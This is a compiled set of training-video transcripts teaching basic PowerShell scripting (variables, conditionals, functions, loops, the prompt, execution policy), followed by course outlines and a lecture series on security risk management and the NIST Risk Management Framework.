going to reassign it – equals – in single quotes I have – 1 plus – and then 1 in single quotes again. So we're
dealing with two strings. Then I do a Write-Output of $sum, and $sum | Get-Member again. So if I highlight
these three lines, and run, it will run that whole selection all at once. So I'll scroll up in the output, and I get a
little bit more information. The actual result – what gets written – is 11. So '1' + '1' is 11.
And we're not adding them together, but we're concatenating them. So we can concatenate string types in
PowerShell using the plus operator. And the TypeName, in this case, shows System.String and then it shows
all the Member Methods to do with string in the output when we run Get-Member.
Now we can be explicit about the type. We can strongly type our variables if we put the type name in square
brackets before the variable name when we declare it. So on line 9 – in square brackets – I have int, $a = 1. On
line 10, I have string – in square brackets – $b equals the string 2. Then on line 11, I have – in square brackets
– double, $c = 3.14.
Now let's do a few operations with these. So the first one, on line 13, is $sum = $a + $b + $c. So I'm going to
highlight lines 13, 14 and 15. So line 14 is Write-Output of $sum, and line 15 displays the Type with
$sum.GetType(). So I'll highlight the commands on lines 9, 10 and 11. I'll assign these variables a, b and c –
$a, $b and $c – and then on line 13, I have $sum = $a + $b + $c. So let's see how it handles these mixing types
with the plus operator when we're dealing with ints, strings and doubles.
So I'll highlight line 13, line 14 – where I do Write-Output $sum, and line 15 – $sum.GetType() – which will
return the type of sum. And in this case, the sum gives me 6.14. So we have 1, which is an Int, and then we're
adding 2 to an Int type. Now PowerShell will take that string with the number 2 in the string and convert it to
an Int. It'll try to cast it or convert it to an Int to add to the other Int, but then it gets to the $c, and sees we have
another numeric value, but it's a double, so it takes the Int value that it has at that point – after adding a and b –
converts it to a double, and adds 3.14.
So it converts it to the higher precision numeric type. And what comes on the left is very important – So the $a
coming first is significant. And the resulting value – so the resulting type is a double.
Now let's do something similar, but let's switch the order of $b and $a as variables in the sum. So on line 17, I
have $sum = $b – so the string first – plus $a plus $c. Then I do a Write-Output of $sum, and then get the Type
of sum – in this case, with $sum.GetType(). So if I run this, then in the terminal window, I have 213.14. So it
looks like 213.14, but in this case, it takes the string b, and decides we're working with a string type, and then
plus a – even though a is an Int – it concatenates it onto the "2", so at that point we have "21". And then plus c is 3.14, and it appends the 3.14. So it does a full string concatenation. So we get 213.14 as a string, and the Type
in this case does show String.
Now let's talk about some simple arrays. So on line 22, I have an array that I declare – $L, and I set that equal
to the list of values: 1, 2, 3, 4, 5. Now this will create an array of five elements from 1 to 5. Now I can do the
same thing: $L = 1..5. Now, if I wanted to go from 0, I could do that as well – 0..5, but if I want $L to be the
equivalent, but I want to use the shorthand notation, I can use 1..5, and it will fill in all the values from 1 to 5.
And then on line 24, I do Write-Output of $L, and in square brackets, 4. So I'm getting the element at index 4, and we'll see what that does. So let's run line 23, and then line 24 to write the output. And we get 5. Arrays in
PowerShell are zero-based, so we index the array from 0 to 4 even though our values go from 1 to 5.
We could also do an array of strings. So on line 27, I have $V equals the string "Hello", "World", "ok", "Bob".
And in this case, I'm going to write the output of $V index – in square brackets – at 1. And that returns World.
So this clearly shows that the index of 1 is World, and the index of 0 is Hello. So I could actually just change
that from a 1 to a 0, and Write-Output of $V index at 0, and that gives me Hello. Now I can also just put it on a
line by itself.
In this case, instead of using Write-Output, I can just put $V of 1 on a line by itself, and it will get the same
thing. PowerShell knows to display the contents of the array at that point. Now what if I just put $V? What
does it show? It gives me the entire contents of the array with each element on a line by itself.
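Pulling these behaviors together into a small sketch (the variable names and values here are illustrative, not the on-screen ones):

  [int]$count = 3
  [string]$label = 'items'
  Write-Output ($count + 2)       # 5 – numeric addition
  Write-Output ($label + $count)  # items3 – string concatenation; the left operand decides the type

  $values = 1..5                  # shorthand for 1, 2, 3, 4, 5
  Write-Output $values[0]         # 1 – arrays are zero-based
  Write-Output $values[4]         # 5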
Objectives
[Video description begins] Topic title: Using PowerShell Conditionals. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to use flow control in PowerShell. So by flow control, I mean conditional
statements – if statements or if ... else-if ... else statements.
I'm going to go through a few examples here to demonstrate a few different ways you can use if statements. So
I'll start out in line 1 with the basic if statement. So I have the word if and then, in parentheses, I have the
Command-let Test-Path, and then in a string, I have "file.txt." So Test-Path tests if the file exists. So since I'm
specifying just the filename and not the full path to the file, it's going to check relative to where I am, so in my
current folder.
So just by inspection here in my current folder, there is a file called "file.txt" and it just has a string in it called
"Hello, World!" [Video description begins] The instructor selects the tab file.txt besides demo_06.ps1 to show
the string and he comes back to the same tab again. [Video description ends] So it should discover this file and
that it does exist and it will output the string "File Exists." So the code that's executed as part of this if
statement comes in between the braces. So this is called the if block. So anything between the open and closed
brace gets executed.
Here I only have a single line that outputs "File Exists." Let's test this now. So I'll highlight the first 4 lines of
code including the open and closed braces, and then I'll run the current selection. And in the output, we get the
string "File Exists." Now it does show the actual code that gets processed and then the result of the code all in
this PowerShell terminal. Now I'll move down to line 6 and 7, where I assign 2 variables that I'm going to use
in the next block.
So on line 6 I have $x = 99 and on line 7, $y = 3. And then starting on line 9, I have if and then in parentheses, $x and then -gt, which means greater than. So we're looking for the condition x > y. And if this is true, it outputs the string "x > y" – x, the greater-than symbol, and y. And then on line 11, I close the braces around the first part of the if. And then I put in elseif (all one word) and then, in parentheses, the condition that gets checked if the first condition fails. So in this case, it checks $x -lt $y. So it's checking if the x variable is less than the y variable. And if it is, I output "x < y" – so the less-than symbol. Again, each block is surrounded by braces, then else, and then another block – an open and close brace block – with "x must be equal to y!" It's stating this as a fact with an exclamation mark.
So the else block gets executed only if x is not greater than y and x is not less than y. So the only other possible
condition is that it must equal y. Then on line 17, I create a string variable s. So $s equals the string "Hello,
World!" And then on line 19, I say if and then in parentheses, $s -like. So this is going to compare it with a
wildcard. So I have, in single quotes, 'World', with an asterisk in front of it. So this is a wildcard that checks if the string contains "World" – so *World*. If it's anywhere within the string, this condition will be true. So I have the output "string contains world." And then the if block ends with a
closing brace. So I'll go back up and I'll execute the assignment of x and y, and assign the variables x is 99 and
y is 3. And then I'll highlight the if-else block from lines 9 to 15 and execute those on their own.
And in this case, it outputs x > y. Because x is 99 and y is 3. I can change those variables. Let's say we make
x=9 and y=33. I highlight those lines of code, run them again, so I reassign the variables, highlight the if block
and I get x < y. Now I'll set them to be the same. So we can check all branches of this if statement, reassign the
variables, and check the if block again. In this case, it prints x must equal y!
And now I'll select all of the code at the end with the $s="Hello, World!" and checking if s is like *World* So
checking if world is in the string, and it should be, and it does print string contains World. And that concludes
this demonstration of PowerShell conditionals.
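Reconstructed from the walkthrough above, the conditional blocks look roughly like this (exact strings may differ slightly from the on-screen code):

  $x = 99
  $y = 3

  if ($x -gt $y) {
      Write-Output "x > y"
  }
  elseif ($x -lt $y) {
      Write-Output "x < y"
  }
  else {
      Write-Output "x must be equal to y!"
  }

  $s = "Hello, World!"
  if ($s -like '*World*') {
      Write-Output "string contains World"
  }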
[Video description begins] Topic title: Creating PowerShell Functions. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how custom functions are created in PowerShell. So on line 1, I defined a
function using the function keyword and then the name of the function. So the name of the function should use
the same verb-noun convention that's used throughout PowerShell. So in this case, I've called it Show-
Greeting. And then inside the braces, the open and closed braces from lines 1 to 16, is the definition of the
function itself. Only a process block is technically required, but the other ones are available as well. So then on line 2, I define the parameters.
So this is to handle arguments passed into the function. So I have param and then in parentheses, on the next two lines, I define two parameters: string in square brackets – so I define the type – followed by $greeting, and then on the next line, string in square brackets again, followed by $recipient. So it's going to take a greeting
and a recipient and then put them together. Then on line 6, I have a begin. So this gets executed before the
function is processed. So at the very beginning, when the function is called, I write output just the string
"Function beginning."
So you can have an initialization step, then a process block and an end. So the process is the most important one. So on line 9, I have process and then, in braces on the next two lines 10 and 11, I have Write-Output and the strings "Piped data:" and then a $_. Now there are two ways you can pass data into
functions. Either through an object that's piped into the function, which is the $_, that's how it's received. Or as
a parameter passed into the function, a named parameter like greeting and recipient.
So I also Write-Output the string, and inside the string, I have "$greeting, $recipient!" And then the end block gets called after the function is processed, before it returns, and we get the "Function end" that will get printed to the console. And then I put a little comment here, # Show-Greeting, to show that this block is the end of the function. Then on line 18, I call the function Show-Greeting. But I have the string "Value" that I pipe into the function. So I have "Value" | Show-Greeting, then -greeting, followed by the string "Hello", -recipient, followed by the string "World."
Now I'm gonna highlight the entire function, press the run selection command, and then highlight the code on
line 18, where Show-Greeting is called. So we make sure that the function is defined by executing the block of
code that defines it, and then I execute the code that calls it. And then in the output, Function beginning, Piped
data: value, Hello World!, Function end.
So I went through each of the steps and value gets passed in in the $_ variable. Now on line 20, I have Show-
Greeting then -greeting "Hi" -recipient "Bob" and then three parameters 1 2 3. But nothing is done with those,
because there's nothing in the function to handle them. So they get ignored. So we have Function beginning, Piped data: (nothing), Hi, Bob!, and then Function end. And that concludes this demonstration of how to create a
PowerShell function.
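Reconstructed from the description above, the function and the two calls look roughly like this (minor details may differ from the on-screen code):

  function Show-Greeting {
      param (
          [string]$greeting,
          [string]$recipient
      )
      begin {
          Write-Output "Function beginning"
      }
      process {
          Write-Output "Piped data: $_"
          Write-Output "$greeting, $recipient!"
      }
      end {
          Write-Output "Function end"
      }
  } # Show-Greeting

  "Value" | Show-Greeting -greeting "Hello" -recipient "World"
  Show-Greeting -greeting "Hi" -recipient "Bob" 1 2 3   # extra positional values are ignored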
Objectives
[Video description begins] Topic title: Using PowerShell Loops. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to create a for, a foreach and a while loop in PowerShell. So in this code on
line 1, I start with the basic for loop. So this for loop has three statements within it. So in parentheses, the first
clause before the first semi-colon is an initializer. So we initialize the loop variable, $i = 1. Then in the middle
we have the condition.
The loop will continue as long as this condition is true. So $i -le, for less than or equal to 10. So this will loop while i is less than or equal to 10. And then there's another semicolon, followed by the loop increment. And in this case, I have $i++ to increment the loop variable by 1 on each iteration. And then the body of the loop is enclosed in braces. And this loop, all it does is output the variable i. So we'll get it on the screen. So what I'll do is, I'll
highlight these 4 lines of code and run the selection and we'll have a look at the output. And we get the output
from 1 to 10.
Now let's do a foreach loop. So, on line 6, I create a variable, an array called value. So $values equals a string
'A', 'mixed', 5, 'array,' the literal string 'array' (in single quotes), 9, 'values.' So there's a mixed array of values
with some strings and some numbers, and we're going to take a foreach loop. So foreach is the keyword, and
then in parentheses, we get the loop variable. So $s, then the keyword in, then $values. So we're taking the variable that
we're going to use on each iteration of the loop that will take the next value.
So it will start with A and the loop will continue until it reaches the end of the loop for the actual string
'values.' And then on each iteration inside of the braces, it's going to have Write-Host of $s. So it's going to use
the Write-Host function to write the variable. Now we could write it just by putting the variable on a line by itself, or we could use Write-Output, or we can use Write-Host. So there are different ways to output values.
Write-Host is often used when we want to add color or some other formatting to the output.
So, let's highlight these lines of code from where we initialize the values and the loop itself. So I'll run this
selection. And we get the loop printing A mixed 5 array 9 and values, as expected. And now for the final loop,
we have $j. So this variable j is initialized to be equal to 40. Then I have the while and in parentheses, the
condition for the loop to run.
Now in this case, it only has a single condition. So we have to make sure there's always a chance for this
condition to be true or some other way to break out of the loop, like using the break statement. So in this case
in parentheses, we have $j -gt for greater than 0. Since J starts out at 40, we want to make sure that j is
decremented or the value is decreasing so that it will eventually hit 0.
So in the first step of the loop, inside of the main braces for the while loop, we have $j--. This will decrement the value of j by 1. And then $j on a line by itself, which will output the value of j. Then inside of the loop on
line 17, I have if and in parentheses, I have $j % 7. So the percent symbol for the modulus operator -eq 0. So if
j % 7 is equal to 0, it means the value j is divisible by 7.
And if it is, I put a condition in here to demonstrate the break statement, which will take us out of the loop at
that point without continuing the iteration. So regardless of whether or not the condition is still met, it breaks
and exits the loop. So, I'll select all of the code from the loop and the initialization of the $j variable to 40. I'll
execute it. And in the output we get, 39, 38, 37, 36, and 35. So when it reaches 35, it checks to see if it's
divisible by 7, and because 7 * 5 is 35, it is divisible by 7. So it breaks out of the loop. And that concludes this
demonstration of PowerShell loops.
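Reconstructed from the walkthrough, the three loops look roughly like this (exact values come from the demo; formatting may differ from the on-screen code):

  for ($i = 1; $i -le 10; $i++) {
      Write-Output $i
  }

  $values = 'A', 'mixed', 5, 'array', 9, 'values'
  foreach ($s in $values) {
      Write-Host $s
  }

  $j = 40
  while ($j -gt 0) {
      $j--
      $j
      if ($j % 7 -eq 0) {
          break    # exits the loop when j is divisible by 7 (at 35)
      }
  }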
Objectives
[Video description begins] Topic title: Working With the PowerShell Prompt. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate how to run commands at the PowerShell command prompt. This is also called a
REPL environment - A Read, Evaluate, Print Loop and it's very good for exploration, discovery and testing. So
I have PowerShell opened here, which you can open from the menu. It comes installed with Windows 10 and
when you open it, you can start running PowerShell commands right from the command prompt.
First thing I'll do is check the version. So I'll print the $PSVersionTable. And if you partially write a command
and hit tab, it will autocomplete the command for you. So in this case I have the version information, printed. I
can also run commands like I did in other videos in this series, like Get-Date. And it displays the results from
the command prompt. Let's have a look at the path of the current folder. So I'll type Get-ChildItem -Path .
which will give me the contents of the current folder.
So there's a number of PowerShell scripts and a text file called "file.txt." What I'm going to do is run one of these scripts. If I want to run a script from the current folder, I do ./ or .\ and then the script name, let's say demo_09.ps1. Then I get the result "Hello World" from this file. So we can run scripts from the command prompt, and we can get the contents of a file. So if I do Get-Content and specify, in a string, "file.txt", it gives me the contents of file.txt, which also has "Hello, World!"
We can also get help by running Get-Help. So let's do a Get-Help of Get-Content, and it prints the help for Get-Content right here at the command prompt – much the same way as on a Linux system, where you can read the manual pages using the man command. We can also
create files if I do New-Item -Path, let's call this test.txt, then -ItemType File. And now if I do Get-ChildItem
with Path .
I can see the new file "test.txt" created with a length of 0. So it's an empty file, but we've created it. I can
remove the file using Remove-Item "test.txt." And if I type Test-Path now with test.txt, it returns false because the file doesn't exist. Now if I do the same with Test-Path "file.txt", it returns true because that file
is there. Now other than the PowerShell command prompt, there's also a utility called the PowerShell ISE - the
Integrated Scripting Environment. But it's no longer in active development by Microsoft.
Now I'll switch over. I have it open here. Now it is quite handy to use because it has all of the commands in the
listing along here on the right-hand side that I can use.
[Video description begins] The instructor switches to the Windows PowerShell ISE, which is already opened
in his machine. [Video description ends]
The current recommendation from Microsoft is to replace this environment with Visual Studio Code with the PowerShell extension, like I've been doing in other videos in this series. But if I type a command, say, Get-Help or Get-History – I can actually start typing and it gives me a menu, and I can arrow up through this menu. It has autocomplete, but it also has a nice menu showing the possibilities that I can use to complete it.
It's quite a handy environment, but the recommendation is to go with Visual Studio Code. And inside of Visual Studio Code, there's also a terminal section with the integrated PowerShell console.
[Video description begins] Again, he switches back to the PowerShell. [Video description ends]
And you can type your commands in here. If I type in .\demo_09.ps1, it prints "Hello world!" So there are many options to use PowerShell from a prompt or a REPL that we can use for exploration, discovery and testing, along with active development like we do here in Visual Studio Code. And that concludes this demonstration of the PowerShell prompt.
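As a quick recap of the file-related commands used at the prompt (test.txt is the throwaway file from the demo):

  New-Item -Path "test.txt" -ItemType File   # create an empty file
  Test-Path "test.txt"                       # True
  Remove-Item "test.txt"                     # delete it
  Test-Path "test.txt"                       # False
  Get-Content "file.txt"                     # prints: Hello, World!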
[Video description begins] Topic title: Setting PowerShell Execution Policy. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate how to explore the runtime environment of a PowerShell script. The most
important aspect of this is the execution policy. We can restrict or limit execution of scripts, so that we can
limit the possibility of a security incident. First, we'll check the execution policy with the command-let get
execution policy. I have Visual Studio Code open and I'm in the PowerShell Integrated Environment. So in this
terminal section I type Get-ExecutionPolicy.
And at the moment it's set to restrict it, which means that by trying to execute a script, it's going to fail. So
open in PowerShell I have this demo_10.ps1. If I try to execute this script, it gives me an error. So it says the
script's name cannot be loaded because running scripts is disabled on this system. So you need to enable it by
setting the execution policy. Now, one way I can see the execution policy in a little bit more detail is typing
Get-ExecutionPolicy -List.
So it shows some more details: there's MachinePolicy, UserPolicy, Process, CurrentUser, and LocalMachine. Now the main ones are Process, CurrentUser, and LocalMachine, which are currently all set to Restricted. The default is a Restricted policy. But a balanced approach is either AllSigned or RemoteSigned - that is, either all scripts need to be signed or just remote ones. An Unrestricted policy runs all of your local scripts, but for scripts that are downloaded, say from the Internet, you are warned and asked for permission before running. There's also an execution policy called Bypass, which has the least restrictions - no blocks and no warnings. You should never use the Bypass execution policy, at least never in production or an operational environment. But in any case, you're better off going with a balanced approach that requires some scripts to be signed.
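To summarize what was just described, here's a quick way to inspect the policy from any PowerShell prompt (the comments simply restate the policy levels from this video; these commands change nothing):

# Show the effective execution policy (Restricted on this demo machine)
Get-ExecutionPolicy

# Show the policy at every scope: MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine
Get-ExecutionPolicy -List

# Policy levels, roughly from most to least restrictive:
#   Restricted   - no scripts run (the default)
#   AllSigned    - every script must be signed by a trusted publisher
#   RemoteSigned - local scripts run; downloaded scripts must be signed
#   Unrestricted - local scripts run; downloaded scripts prompt a warning
#   Bypass       - nothing is blocked and there are no warnings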
So I'm going to go to search, type in powershell, right-click on Windows PowerShell, and run as administrator. To change the policy with Set-ExecutionPolicy, we actually need to run as an administrator. So I've opened up PowerShell as an admin.
[Video description begins] The instructor opens the PowerShell terminal. [Video description ends]
And I'm going to type Set-ExecutionPolicy, then -ExecutionPolicy for the argument, and I'm going to set it to RemoteSigned. Then I'm going to set the -Scope to CurrentUser and answer Yes when prompted. Now if I go back to Visual Studio Code and re-run Get-ExecutionPolicy -List, CurrentUser has changed to RemoteSigned.
[Video description begins] He switches back to the Visual Studio Code terminal. [Video description ends]
Now I'm also going to set the same policy at the LocalMachine scope.
[Video description begins] He again switches to the Windows PowerShell. [Video description ends]
But if I go back to Visual Studio Code and check the execution policy, Process is still set to Restricted. So I want to close Visual Studio Code and re-open it. And now, from the integrated PowerShell terminal, if I type Get-ExecutionPolicy -List, it shows RemoteSigned. So if I try to run demo_10.ps1, it works and I get the result "Hello, World!" There are no errors and no warnings, and the execution policy has been updated successfully. And that concludes this demonstration of PowerShell execution policy.
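Putting the whole demo together, here is a minimal sketch of the commands in order (the Set-ExecutionPolicy lines must run from an elevated PowerShell prompt, and demo_10.ps1 is simply the sample script used in this video):

# From Windows PowerShell running as administrator
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine

# Back in the Visual Studio Code integrated terminal (reopened so the Process scope picks up the change)
Get-ExecutionPolicy -List    # CurrentUser and LocalMachine now show RemoteSigned
.\demo_10.ps1                # runs and prints "Hello, World!" with no errors or warnings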
Objectives
[Video description begins] Topic title: Course Summary. The instructor for this video is Steve Scott. [Video
description ends]
So in this course, we've examined PowerShell scripting techniques, including working with objects, variables, flow control, and loops. We did this by exploring the purpose and use cases for PowerShell scripting, how to work with different types of PowerShell objects and their properties, how to work with PowerShell variables and arrays, how to use flow control, create custom functions, and create loops in PowerShell, how to run commands at the PowerShell prompt, and the runtime environment of a PowerShell script.
In our next course, we'll move on to explore Python scripting, including how to work with variables, loops,
functions, file operations, and web URL requests.
Table of Contents
Objectives
identify the purpose of and use cases for various Python scripts
Objectives
assign basic values to variables and containers, such as lists, dictionaries, and tuples, in a Python
script
Objectives
In this course, you'll learn about and construct the essential elements of C and C++ code and generate binary files suitable for Linux and Windows operating systems. You'll work with variables and arrays in C/C++, and learn how to use vectors and standard containers in C++. Next, you'll learn how to use C/C++ conditional statements and loops, as well as how to perform string manipulation in both C and C++. Lastly, you'll learn how to define and call C/C++ functions, and how to work with pointers in a C program.
Table of Contents
Objectives
compile and run a Windows Portable Executable (PE) from C/C++ code
Objectives
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years teaching organizations how to manage their
network environments and program applications with Microsoft technologies.
[Video description begins] Your host for the session is Glen E. Clarke. He is an IT Trainer and a
Consultant. [Video description ends]
I'm also an award-nominated author who's written the CompTIA Security+ Certification Study Guide, the CompTIA Network+ Certification Study Guide, and the best-selling CompTIA A+ Certification All-in-One For Dummies. My focus, over the last ten years, has been teaching Microsoft certified courses, information security courses, and networking courses such as ICND1 and ICND2.
On the journey from security analyst to security architect, understanding how to perform a risk analysis is especially important, particularly from the viewpoint of a forensic analysis. In this course, I'll explore security risk management concepts to better understand how to assess, categorize, monitor, and respond to organization-wide risk.
I'll describe risk as it relates to information systems and differentiate between threats, vulnerabilities, impact, and risk. I'll also describe the steps of the NIST Risk Management Framework, including categorizing risk, selecting security controls, implementing security controls, assessing security control effectiveness, examining the output of the security controls assessment to determine whether or not the risk is acceptable, and the last step of the Risk Management Framework, monitoring controls. I'll then discuss the benefits of a control-focused risk management approach and an event-focused risk management approach, and list essential concepts for presenting risk to stakeholders, such as soliciting stakeholder input. Lastly, I'll differentiate between different risk responses such as accepting, avoiding, mitigating, sharing, or transferring risk.
[Video description begins] Topic title: Understanding Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about risk as it relates to information systems. The range of devices included in today's information systems spans application-specific servers, database servers, mobile devices, and cloud resources. Today's information systems are complex in nature due to the different components involved, their dependencies on one another, and the communication channels between one another.
There are a number of different threats against each component of the information system that can have
adverse effects on the organizational assets and operations, if exploited. This includes the risk of exploiting
known and unknown vulnerabilities to compromise the confidentiality, integrity, or availability of the
information being processed, stored, or transmitted by those systems.
The types of threats to organizations and their assets include purposeful attacks, such as a denial of service attack on the company website, environmental disruptions, such as a power outage, and human or machine errors, such as a system crashing. It is the job role of information security professionals and information security managers to understand the security risk associated with each information system component that supports the missions and the business functions of the organization.
There are a number of different types of risk for organizations. For example, organizations should be concerned with risk against their investments; any legal liabilities the organization may have due to its actions and the actions of its employees; risk to the safety of employees; supply chain risk, which involves ensuring that the organization is able to receive the needed goods from suppliers; the security risk related to information systems and physical security; and finally, program management risk. The key point to remember here is that when you think of risk management, don't just consider risk to information systems; risk management is for all aspects of the organization, not just the information systems.
[Video description begins] Screen title: Risk Management. [Video description ends]
In today's complex environments, organizations have new state-of-the-art information systems and are also maintaining legacy information systems. And in most cases, the new state-of-the-art systems have to communicate with the legacy systems to access the data that's housed on those systems.
Effective risk management requires that organizations understand the full extent of their information systems
and components to fully understand the risk associated with those components and each of the business
functions. The risk of these systems being involved in a purposeful attack, environmental disruptions, or
human error, can cause the business mission or business as a whole to fail.
As security professionals responsible for risk management, it is important to develop the necessary and
sufficient risk response measures to adequately protect the company mission and business functions of the
organization.
In order to effectively manage information security risk across the organization, there are a number of key elements that must be followed. The first step is to assign risk management responsibilities to senior leaders and executives within the organization. Next, it's important that senior leaders and executives recognize and understand the information security risk to the organization's operations, assets, and personnel. You then must determine the organization's tolerance for risk, ensure that this risk tolerance is communicated throughout the organization, and understand how risk tolerance will aid in risk decision making. The final key element is accountability by senior leaders and executives within the organization. They are ultimately responsible for the risk management decisions and the implementation of an effective organization-wide risk management program. In this video, you learned about risk as it relates to information systems.
In this video, learn how to differentiate between threats, vulnerabilities, impacts, and risks.
Objectives
[Video description begins] Topic title: Risk Management Concepts. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about risk management concepts and the difference between threats,
vulnerabilities, impacts, and risk. When performing risk assessment, your decisions are driven by risk
concepts, such as the threats, vulnerabilities, impacts, and the risk. Let's take a look at each of these terms.
Threats are events that can have a negative impact on a company asset.
For example, a company website has the potential threat of a denial of service attack occurring against the website. These threats can be man-made threats, such as a virus, or natural occurrences, such as a fire or flooding. When talking about risk and risk management, you will hear the term vulnerability quite often.
A vulnerability is a weakness in a product, a system, or information that allows the threat to be possible. For
example, a vulnerability could be that the web server processes malicious HTTP requests, which makes it
vulnerable to folder traversal attacks. The next risk term to be familiar with is impact.
When assessing risk, we evaluate the weaknesses and the threats against those weaknesses. But we also evaluate the impact that a threat will have if it is successful in exploiting the vulnerability. For example, you have an e-commerce website that is vulnerable to a denial of service attack. It might have an impact of loss of revenue for the time that the website is down. When assessing risk, you would calculate that loss of revenue, which would identify the impact of the threat.
[Video description begins] The following point appears on the screen: The extent that changes to an
information system could affect the security state of the system. [Video description ends]
When we put this all together, we can calculate the risk of an event. The risk is the chance that a specific threat exploits a specific vulnerability to cause a negative effect on a system or its information. In this video, you learned about risk management concepts and the difference between threats, vulnerabilities, impacts, and risk.
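The video doesn't prescribe a formula for this calculation, but one common qualitative approach is to score each threat and vulnerability pair by likelihood and impact and multiply the two. Here is a minimal PowerShell sketch of that idea; the threats, vulnerabilities, and scores below are made up purely for illustration:

# Hypothetical qualitative scores: 1 = low, 2 = moderate, 3 = high
$risks = @(
    @{ Threat = 'Denial of service against the website'; Vulnerability = 'No traffic filtering'; Likelihood = 2; Impact = 3 },
    @{ Threat = 'Flooding at the data center'; Vulnerability = 'Single site, no alternate'; Likelihood = 1; Impact = 3 }
)

foreach ($r in $risks) {
    # Risk = the chance the threat exploits the vulnerability (likelihood) x the negative effect if it does (impact)
    $score = $r.Likelihood * $r.Impact
    '{0}: risk score {1}' -f $r.Threat, $score
}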
Upon completion of this video, you will be able to describe the first step of the NIST risk management
framework, which is categorizing risk.
Objectives
describe the first step of the NIST risk management framework, categorizing risk
[Video description begins] Topic title: Categorizing Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video, we look at the first step of the NIST Risk Management Framework, which is categorizing risk. There are six main steps to the NIST Risk Management Framework, plus a prepare step, which involves assigning risk roles to individuals within the company and determining the risk tolerance for the organization. Once the prepare step is complete, you move on to categorizing risk. With categorizing risk, you identify the systems and information, and describe and document those systems. The goal of this phase is to identify how critical a system and its information are to the organization from a worst-case scenario point of view, and the impact to the organization or business functions if the asset is lost.
When determining the criticality of a system, the system owner evaluates the impact of loss on the three
security objectives of confidentiality, integrity and availability. For example, the system owner may determine
that if a system has a security compromise affecting availability, it is considered low impact to that system.
Yet a security compromise affecting the confidentiality of the system may be considered a high impact to the system. When the system owner is determining the impact of loss to the three security objectives, they
typically go with one of the following ratings. First we have a low rating, meaning the loss has very little
impact to the security objective. We have moderate as a rating, which means the loss has serious impact to the
security objective.
And then finally we have a high rating, which means that the loss has catastrophic impact to the security
objective. The values used to assign impact levels to the loss of the security objectives help the organization determine the security controls to put in place to help protect the asset. For example, if the availability impact level is low but the confidentiality impact level is high for an asset, the organization will invest in encryption solutions over high-availability solutions for that asset. In this video, you learned about categorizing risk.
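As a rough illustration of that last point, here is a small PowerShell sketch; the asset, the impact levels, and the decision logic are hypothetical examples, not values from the video:

# Hypothetical categorization of one asset against the three security objectives
$asset = @{
    Name            = 'Customer database'
    Confidentiality = 'High'
    Integrity       = 'Moderate'
    Availability    = 'Low'
}

# Spend on controls where the impact of loss is highest
if ($asset.Confidentiality -eq 'High') {
    "Prioritize encryption and access controls for $($asset.Name)"
}
if ($asset.Availability -eq 'High') {
    "Prioritize high-availability solutions for $($asset.Name)"
}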
Upon completion of this video, you will be able to describe the second step in the RMF, which is selecting
security controls.
Objectives
[Video description begins] Topic title: Selecting Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about the second step of the Risk Management Framework, selecting the security controls. Once you finalize the categorizing phase, you can then move on to the select phase, whose focus is to determine the security controls that are needed to protect an asset and its information. Not only do you select the security controls, but you also define the appropriate baseline configuration for each security control and any tailored guidance or customization recommendations that could be made.
The Federal Information Processing Standard, or FIPS for short, includes FIPS 200, a standard that defines 17 security areas that help address a balanced security program. This standard includes management, operational, and
technical security controls. The standard also works closely with NIST Special Publication 800-53 and
describes the need for a minimum baseline of security controls and that the controls are to be tailored
appropriately for the environment that they are used in. Security controls are components put in place to
protect the confidentiality, integrity, and availability of our systems and information.
For example, a firewall and a RAID array are examples of security controls. When choosing security controls, you have security control baselines, which are a selection of controls based on the family of the control and the impact level you wish to reach. Examples of control families are access control, and audit and accountability, whereas examples of impact levels are low, moderate, and high. Low meaning the loss has very little impact to the security objective. Moderate meaning the loss has serious impact to the security objective.
And high meaning the loss has catastrophic impact to the security objective. The implementation of the
security controls may need to change depending on the environment they're placed in. For example, the
implementation is different for cloud resources versus a mobile device versus a control implemented in an
application. You will need to tailor the control to fit the scenario. The security control baselines are determined
by a number of components such as the security category for the asset the control is guarding.
For example, is the security control guarding data or information or is it designed to guard a system? The
security control baseline is also determined by the risk associated with that asset. The risk level comes from
risk assessments but also the organization's tolerance to risk. The baselines are a starting point for the security controls and should be tailored to fit the mission of the company and the environment of the system or information that the control sits in.
It should be noted that some controls are not included in the baselines. There are a number of control families listed in the control catalog found in Appendix F of Special Publication 800-53. For example, security controls that deal with access control get a code of AC, configuration management controls get a code of CM, incident response controls get a code of IR, planning controls get a code of PL, and personnel security controls get a code of PS. As an example, Appendix F of NIST Special Publication 800-53 lists different controls for the different families. When looking at the document, you will see a control called AC-2, Account Management. So this is an access control that deals with account management. When you read the recommendations for this control, they describe the controls needed to have temporary accounts automatically removed after they expire. In this video, you learned about selecting the security controls.
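To make the family codes concrete, here is a small PowerShell sketch; the codes and the AC-2 example come from the video, while the lookup itself is just an illustration:

# Control family codes mentioned in the video (from the NIST SP 800-53 control catalog)
$controlFamilies = @{
    AC = 'Access Control'
    CM = 'Configuration Management'
    IR = 'Incident Response'
    PL = 'Planning'
    PS = 'Personnel Security'
}

# A control identifier such as AC-2 (Account Management) is the family code plus a control number
$controlId = 'AC-2'
$familyCode = ($controlId -split '-')[0]
"$controlId belongs to the $($controlFamilies[$familyCode]) family"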
Upon completion of this video, you will be able to describe the third step in the Risk Management Framework,
implementing security controls.
Objectives
[Video description begins] Topic title: Implementing Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about implementing security controls. Step three of the Risk Management Framework is to implement the security controls that were selected during the select stage. When implementing the security controls, you should follow sound systems engineering practices to ensure that the controls are implemented in a secure manner. When applying the security configuration settings to the control, be sure to implement the control following the best practices supplied in NIST Special Publication 800-160.
This publication not only discusses best practices for security configuration, but also stresses validation of the
